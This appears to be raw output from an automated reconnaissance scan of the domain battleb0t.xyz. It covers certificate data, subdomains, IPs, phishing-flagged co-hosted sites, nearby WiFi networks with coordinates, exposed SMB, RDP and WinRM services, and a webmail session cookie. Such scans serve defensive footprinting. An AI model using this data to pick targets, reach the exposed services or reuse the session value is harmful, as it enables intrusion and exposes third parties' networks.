CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 16:44:09.315 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:EB:B2:4A:B8:57:10:D6:3B:2F:B5:2A:
89:BA:32:85:1C:16:28:E8:45:62:3E:AC:5F:C1:A7:01:
D5:8E:30:E3:17:02:20:27:39:6A:04:D2:61:CC:BD:8C:
4F:C5:13:6E:02:18:EB:24:BE:73:9E:F1:B4:F7:D8:89:
3A:CF:69:2B:AA:1C:75
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 13 16:44:09.312 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:73:42:08:21:4C:2B:6E:54:89:A5:9F:6C:
27:A0:E3:7D:5D:89:06:32:EB:1E:21:D3:16:0C:E5:9D:
AB:38:FC:69:02:20:6E:F0:01:D9:C1:A2:AD:6E:65:26:
28:CF:30:5D:77:85:32:E7:53:E7:81:77:F5:0B:21:74:
83:B6:A0:E7:EA:52
Signature Algorithm: sha256WithRSAEncryption
32:8d:f0:fd:98:aa:6b:67:8b:fd:50:1f:a3:82:12:f7:96:0e:
20:1c:fd:bd:65:b3:76:ea:7d:e7:8e:de:49:56:5d:75:39:27:
85:12:91:b5:c9:aa:a8:98:14:b1:0b:89:0c:69:e2:0c:9e:47:
2e:8e:21:a5:d8:33:ba:43:8f:1a:0f:2c:6a:f9:b8:67:f2:5f:
5c:7a:06:bd:b7:ef:55:c1:6f:51:6b:fa:6b:09:ef:8b:fb:80:
49:8f:ee:cc:90:25:a6:9f:27:ae:ce:25:a8:cb:20:f2:07:c4:
43:8f:46:e1:64:24:94:30:c9:cf:5b:53:42:96:1a:a8:a3:26:
9e:e0:4f:a8:90:5b:82:db:4d:1c:ca:70:31:76:0c:bb:6c:d1:
c9:02:ca:92:68:04:3a:5e:ff:d1:9c:cc:9d:29:99:f7:9f:50:
63:8c:bd:09:15:13:aa:10:8a:fe:a4:7b:38:d1:de:50:78:a9:
f5:b9:42:b6:a4:a3:92:70:93:b5:82:12:31:84:1f:7a:4e:c1:
b5:6e:db:bb:40:e0:59:4d:30:89:d2:e6:e9:ce:d5:19:06:a3:
10:65:96:34:86:38:78:b2:8f:41:76:5c:48:0c:dd:1e:50:46:
64:18:01:03:0a:cf:fb:4b:6e:47:08:59:20:26:e3:b6:52:18:
5b:fb:b5:4a
| battleb0t.xyz |
| 2023-05-12 03:11:15 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | London, England, W1B, United States, North America | 2a06:98c1:3121::1 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 2 | 0 | None | Cloudflare Inc: https://www.cloudflare.com/ | 188.114.96.1 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00d2.github.io]
https://www.openphish.com/feed.txt | 00d2.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:79:02:18) | 41.8781, -87.6298 |
| 2023-05-12 02:53:10 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 3 | 0 | None | Cloudflare Inc. Cloudflare | vscode.battleb0t.xyz |
| 2023-05-12 02:54:48 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H0694HWAMG6RHJEVW16FQRHY"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 34.148.97.127 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BARWN-UnitedLayer01 (Net ID: 00:02:6F:01:86:4F) | 37.7642, -122.3993 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:03:05) | 50.8897, 6.0563 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | herron-libson (Net ID: 00:01:24:F1:75:B2) | 37.7813933,-122.3918002 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/ayshoo/ | ayshoo |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:EC:8D:60) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:15 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://www.battleb0t.xyz | www.battleb0t.xyz |
| 2023-05-12 03:01:09 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.119): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:15 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://oldfluid.battleb0t.xyz | oldfluid.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D7:31) | 32.8608, -79.9746 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:0C:41:86:BE:6A) | 32.8608, -79.9746 |
| 2023-05-12 02:44:56 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 185.199.111.153 |
| 2023-05-12 03:09:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | eliaspinheironeto.github.io |
| 2023-05-12 03:08:46 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.218 | 104.196.30.220 |
| 2023-05-12 02:54:14 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://nwapi2.battleb0t.xyz | nwapi2.battleb0t.xyz |
| 2023-05-12 02:45:32 | Malicious Internet Name | Yes | VirusTotal | 0 | 0 | 1 | 0 | None | VirusTotal [ayhu.xyz]
https://www.virustotal.com/en/domain/ayhu.xyz/information/ | ayhu.xyz |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-to-1.github.io]
https://www.openphish.com/feed.txt | 0-to-1.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | azis (Net ID: 00:06:B1:15:73:DD) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.13): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:09:09 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 46.101.229.63 | 46.101.229.70 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LAB1234 (Net ID: 00:0C:41:CB:47:70) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-B772 (Net ID: 00:1D:CF:82:B7:70) | 32.8608, -79.9746 |
| 2023-05-12 03:01:12 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.127): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | linux | 87.248.157.102 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1100 (Net ID: 00:01:03:79:01:88) | 41.8781, -87.6298 |
| 2023-05-12 03:00:47 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.63): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-50B2 (Net ID: 90:1A:CA:7D:50:B0) | 37.751, -97.822 |
| 2023-05-12 03:14:28 | Similar Domain | Yes | TLD Searcher | 0 | 0 | 1 | 0 | None | battleb0t.ovh | battleb0t.xyz |
| 2023-05-12 02:53:49 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 2606:50c0:8000::153 |
| 2023-05-12 03:41:52 | Raw Data from RIRs | No | Censys | 1 | 0 | 3 | 0 | None | {"operating_system": {"vendor": "Microsoft", "product": "Windows", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*", "other": {"family": "Windows"}}, "last_updated_at": "2023-05-12T01:40:25.089Z", "ip": "45.131.109.53", "labels": ["file-sharing", "network-administration", "remote-access"], "location_updated_at": "2023-05-07T11:15:30.169008Z", "autonomous_system_updated_at": "2023-05-07T11:15:30.169132Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"vm.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-10T21:12:17.288943702Z"}, "11858-33959.pph-server.de": {"record_type": "A", "resolved_at": "2023-04-29T16:38:25.585351786Z"}, "wakapi.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-29T14:27:35.242336552Z"}, "www.tt-dev.de": {"record_type": "CNAME", "resolved_at": "2023-01-05T14:36:51.431345945Z"}, "traefik.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-07T14:38:59.772471404Z"}, "tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-31T14:50:50.814184504Z"}, "test.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-21T14:29:05.064783690Z"}, "wiki.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-08T14:20:13.917172001Z"}, "grafana.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-01T14:18:17.398732703Z"}, "70724-04381.pph-server.de": {"record_type": "A", "resolved_at": "2023-04-20T20:07:07.842037289Z"}, "npm.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-21T14:29:04.915388971Z"}, "portainer.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-14T14:32:52.020207987Z"}, "ci.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-06T14:26:38.984649398Z"}}, "names": ["traefik.tt-dev.de", "npm.tt-dev.de", "vm.battleb0t.xyz", "wakapi.tt-dev.de", "portainer.tt-dev.de", "ci.tt-dev.de", "tt-dev.de", "grafana.tt-dev.de", "test.tt-dev.de", "www.tt-dev.de", "wiki.tt-dev.de", "70724-04381.pph-server.de", "11858-33959.pph-server.de"], "reverse_dns": {"resolved_at": "2023-05-04T16:22:43.166057588Z", "names": ["vm.battleb0t.xyz"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["file-sharing"], "truncated": false, "service_name": "SMB", "_decoded": "smb", "banner_hashes": ["sha256:51d9f41a595c653b76dbff0adeec37710decd99e91825ba2de9ef6e273bfcaf0"], "source_ip": "162.142.125.225", "extended_service_name": "SMB", "smb": {"smbv1_support": false, "negotiation_log": {"security_mode": 1, "system_time": 1683815217, "server_start_time": 1240428288, "_encoding": {"server_guid": "DISPLAY_HEX"}, "capabilities": 7, "server_guid": "0000000000000000000000000000000031a109594c6a1d49a3303a66d4c26ecb", "dialect_revision": 528, "authentication_types": ["1.3.6.1.4.1.311.2.2.30", "1.3.6.1.4.1.311.2.2.10"], "header_log": {"status": 0, "_encoding": {"protocol_id": "DISPLAY_HEX"}, "protocol_id": "00000000fe534d42", "credits": 1, "flags": 1, "command": 0}}, "smb_version": {"major": 2, "version_string": "SMB 2.1", "minor": 1, "revision": 0}, "session_setup_log": {"target_name": "70724-04381", "setup_flags": 0, "header_log": {"status": 3221225494, "_encoding": {"protocol_id": "DISPLAY_HEX"}, "protocol_id": "00000000fe534d42", "credits": 1, "command": 1, "flags": 1}, "negotiate_flags": 2726953477}, "smb_capabilities": {"smb_multicredit_support": true, "smb_persistent_handle_support": false, "smb_dfs_support": true, "smb_leasing_support": true, "smb_encryption_support": false, "smb_directory_leasing_support": false, "smb_multichan_support": false}, "has_ntlm": true}, "observed_at": "2023-05-11T14:26:57.515685601Z", "banner_hex": "534d4220534d4220322e31", "perspective_id": "PERSPECTIVE_HE", "transport_fingerprint": {"raw": "65535,128,true,MNWNNS,1460,false,false", "os": "Windows *", "id": 429}, "banner": "SMB SMB 2.1", "port": 445, "software": [{"vendor": "microsoft", "product": "windows", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*", "source": "OSI_TRANSPORT_LAYER"}]}, {"tls": {"server_key_exchange": {"ec_params": {"named_curve": 24}}, "_encoding": {"ja3s": "DISPLAY_HEX"}, "version_selected": "TLSv1_2", "cipher_selected": "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "certificates": {"_encoding": {"leaf_fp_sha_256": "DISPLAY_HEX"}, "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "ruG0HFgv/8OXJWtxPCjUSQ85xDh2SJLByLm11c5cyZyMwJU/sWedNfO9DrevuT8F7VTYR5X9Jn9+NDXdfpZEQNy6zH+rYAiGSV94DzEOv8TqWPEo6TIzWBaS72PEIlTdq7nRnq7wO229GGWbClkbdw9qb1Ul/qbRHM7TT3kh7/gVKezZbTafnBnRnSghbqP3Z+9EoHVAitQl4NFBxkS94wX+pi5FPNe/dGPxT8v8SrvPl+DxkvgcVomdT3Gt7JTvfgjSWY2hJ5+d9dHNrgV4NShiaSBkDhIw3H44DQxJJGeOiPvGGMCLbHZIhhcbpYiP+//lXbcmsSe7v8Dij7/WiQ==", "exponent": "AAEAAQ=="}, "fingerprint": "46f940f431befbf3e8c0d41e66defd7ca5752176463e410bf7ff1a076f677750"}, "subject_dn": "CN=70724-04381.pph-server.de", "pubkey_bit_size": 2048, "fingerprint": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc", "issuer_dn": "CN=70724-04381.pph-server.de", "names": ["70724-04381.pph-server.de"], "tbs_fingerprint": "103620f100eb7ba4c99aca138e14895b8d66946b6c6a90ced8fa2de351716b31", "subject": {"common_name": ["70724-04381.pph-server.de"]}, "signature": {"self_signed": true, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["70724-04381.pph-server.de"]}}, "leaf_fp_sha_256": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc"}, "ja3s": "364ff14b04ef93c3b4cfa429d729c0d9"}, "_encoding": {"certificate": "DISPLAY_HEX"}, "_decoded": "rdp", "jarm": {"_encoding": {"cipher_and_version_fingerprint": "DISPLAY_HEX", "tls_extensions_sha256": "DISPLAY_HEX", "fingerprint": "DISPLAY_HEX"}, "cipher_and_version_fingerprint": "2ad2ad16d2ad2ad22c2ad2ad2ad2ad", "tls_extensions_sha256": "fd9c9d14e4f4f67f94f0359f8b28f532", "observed_at": "2023-04-25T19:43:40.097167804Z", "fingerprint": "2ad2ad16d2ad2ad22c2ad2ad2ad2adfd9c9d14e4f4f67f94f0359f8b28f532"}, "rdp": {"selected_security_protocol": {"tls": true, "raw_value": 1, "rdstls": false, "error_hybrid_required": false, "credssp_early_auth": false, "error_bad_flags": false, "error_ssl_forbidden": false, "error_ssl_cert_missing": false, "credssp": false, "error_ssl_user_auth_required": false, "error": false, "error_ssl_required": false, "standard_rdp": true, "error_unknown": false}, "protocol_flags": {"dynvc_graphics_pipeline": true, "neg_resp_reserved": true, "restricted_auth_mode": true, "restricted_admin_mode": true, "extended_client_data_supported": true}, "connect_response": {"connect_id": 0, "domain_parameters": {"max_mcspdu_size": 65528, "num_priorities": 1, "max_user_id_channels": 3, "domain_protocol_version": 2, "max_token_ids": 0, "max_provider_height": 1, "max_channel_ids": 34, "min_throughput": 0}}, "version": {"raw": 524299, "major": 10, "minor": 6}, "certificate_info": {}, "x224_cc_pdu_srcref": 13330}, "certificate": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc", "truncated": false, "service_name": "RDP", "labels": ["remote-access", "network-administration"], "source_ip": "167.94.146.58", "extended_service_name": "RDP", "observed_at": "2023-05-11T13:18:54.374691218Z", "perspective_id": "PERSPECTIVE_TELIA", "transport_protocol": "TCP", "port": 3389, "transport_fingerprint": {"raw": "64000,128,true,MNWNNS,1460,false,false"}}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://45.131.109.53:5985/"}, "response": {"body": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\">\r\n<HTML><HEAD><TITLE>Not Found</TITLE>\r\n<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD>\r\n<BODY><h2>Not Found</h2>\r\n<hr><p>HTTP Error 404. The requested resource is not found.</p>\r\n</BODY></HTML>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "Not Found", "protocol": "HTTP/1.1", "body_size": 315, "body_hashes": ["sha256:ce7127c38e30e92a021ed2bd09287713c6a923db9ffdb43f126e8965d777fbf0", "sha1:a66898b36c94c53766e66c1a7aaeb149447ec083"], "status_code": 404, "body_hash": "sha1:a66898b36c94c53766e66c1a7aaeb149447ec083", "headers": {"Content_Length": ["315"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Microsoft-HTTPAPI/2.0"], "Connection": ["close"], "Content_Type": ["text/html; charset=us-ascii"], "Date": ["<REDACTED>"]}, "html_tags": ["<TITLE>Not Found</TITLE>", "<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\">"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:d7de42c1e8c09cf951e3ad6248fda3ab48a60ca3eac8b25effd4b3067df8f362"], "source_ip": "162.142.125.216", "extended_service_name": "HTTP", "observed_at": "2023-05-12T01:02:37.678343941Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a436f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d75732d61736369690d0a5365727665723a204d6963726f736f66742d485454504150492f322e300d0a446174653a20203c52454441435445443e0d0a436f6e6e656374696f6e3a20636c6f73650d0a436f6e74656e742d4c656e6774683a203331350d0a", "perspective_id": "PERSPECTIVE_HE", "banner": "HTTP/1.1 404 Not Found\r\nContent-Type: text/html; charset=us-ascii\r\nServer: Microsoft-HTTPAPI/2.0\r\nDate: <REDACTED>\r\nConnection: close\r\nContent-Length: 315\r\n", "port": 5985, "software": [{"product": "Windows", "vendor": "Microsoft", "source": "OSI_APPLICATION_LAYER", "p | 45.131.109.53 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-7734 (Net ID: 38:70:0C:07:77:32) | 37.751, -97.822 |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.27): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:27 | IP Address | No | DNS Resolver | 51 | 0 | 2 | 0 | None | 104.21.71.14 | nwapi2.battleb0t.xyz |
| 2023-05-12 02:54:23 | Web Content Type | No | Web Spider | 0 | 0 | 5 | 0 | None | text/html;charset=utf-8 | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT9D2Yjw8 (Net ID: E0:22:03:E8:DB:5A) | 37.751, -97.822 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 6566 0615 (Net ID: 00:00:C5:D7:61:48) | 41.8781, -87.6298 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: webmailrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: webmailsession=%3aJ6wQNgi5mDSbd8Aj%2ccc122e301037955ff583c00e21431728; HttpOnly; path=/; port=2096; secure
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2096; secure
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096
Set-Cookie: roundcube_cookies=enabled; HttpOnly; expires=Thu, 09-May-2024 16:40:03 GMT; path=/; port=2096; secure
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12483
| 87.248.157.102 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:01:E6:93:CF:EC) | 37.780462,-122.390564 |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 185.199.110.153 | battleb0t.xyz |
| 2023-05-12 03:03:37 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00tau.github.io |
| 2023-05-12 02:51:01 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://kangbinkwon.github.io/kangbinkwon-Netflix_clonecoding/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_6d4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_6d4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_6d4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1748"\n "IsoScope_6d4_IE_EarlyTabStart_0xdf8_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6d4_ConnHashTable<1748>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_6d4_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1748"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.18.22.52:443"\n "69.16.175.10:443"\n "45.57.90.1:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "code.jquery.com"\n "kangbinkwon.github.io"\n "pro.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a class="authLinks lang" href="https://www.netflix.com/kr/login"></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<form class="cta-form" action="https://www.netflix.com/signup/registration?locale=ko-KR">" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<span class="lang"> . PC netflix.com ," (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/node/412" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://www.netflix.com/kr/login?nextpage=https%3A%2F%2Fwww.netflix.com%2Fyouraccount"" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://media.netflix.com/ko/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://jobs.netflix.com/" class="footer-link"><span class="lang"> </span></a>" (Indicator: 